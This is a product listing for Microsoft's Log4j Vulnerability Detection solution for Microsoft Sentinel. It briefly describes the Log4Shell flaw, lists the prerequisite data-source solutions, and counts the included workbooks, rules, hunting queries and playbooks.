https://store-images.s-microsoft.com/image/apps.51975.59fa55c9-27b0-489d-a2fc-1bb33622367e.2c9a2da0-ab8c-45b1-bf56-58580a2b430e.25eaed70-1229-4ba0-a503-d390d2dfc2e5

Log4j Vulnerability Detection

Microsoft Sentinel, Microsoft Corporation

Log4j Vulnerability Detection

Microsoft Sentinel, Microsoft Corporation

Log4j monitors, detects and investigates Log4Shell vulnerabilities.

Note: Please refer to the following before installing the solution:

• Review the solution Release Notes

• There may be known issues pertaining to this Solution, please refer to them before installing.

Microsoft's security research teams have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”. The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog. This solution provides content to monitor, detect and investigate signals related to exploitation of this vulnerability in Microsoft Sentinel.

Prerequisite :-

This is a domain solution and does not include any data connectors. Install one or more of the listed solutions, or develop your custom ASIM parsers to unlock the value provided by this solution.

  1. Azure Web Application Firewall (WAF)
  2. Microsoft 365
  3. Windows Server DNS
  4. CiscoASA
  5. PaloAlto-PAN-OS
  6. Microsoft Entra ID
  7. Azure Activity
  8. Amazon Web Services
  9. Azure Firewall
  10. SquidProxy
  11. Zscaler Private Access (ZPA)
  12. Syslog
  13. Check Point
  14. Microsoft Defender XDR

Workbooks: 2, Analytic Rules: 4, Hunting Queries: 10, Watchlists: 1, Playbooks: 2

Learn more about Microsoft Sentinel | Learn more about Solutions